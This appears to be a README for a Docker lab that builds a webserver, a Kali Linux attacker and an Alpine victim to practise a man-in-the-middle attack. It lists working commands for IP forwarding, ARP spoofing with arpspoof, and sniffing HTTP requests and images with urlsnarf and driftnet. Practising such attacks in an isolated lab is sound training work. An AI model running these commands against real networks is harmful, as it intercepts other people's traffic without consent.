- Docker is installed
- you can use docker-compose commands
Just use following command:
docker-compose up --build
There are 3 Machines:
- Webserver
- MITM with Kali Linux
- Victim Node (just an simple Alpine Linux)
- Setup IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward - start arpspoof(Important: let it open):
arpspoof -i eth0 -t [Victim-IP] -r [Webserver-IP] - Now you can use:
urlsnarf -i eth0-> get HTTP-Requestsdriftnet -i eth0-> get Images
Just type inside wget webserver:8080 or outside docker exec victim webserver:8080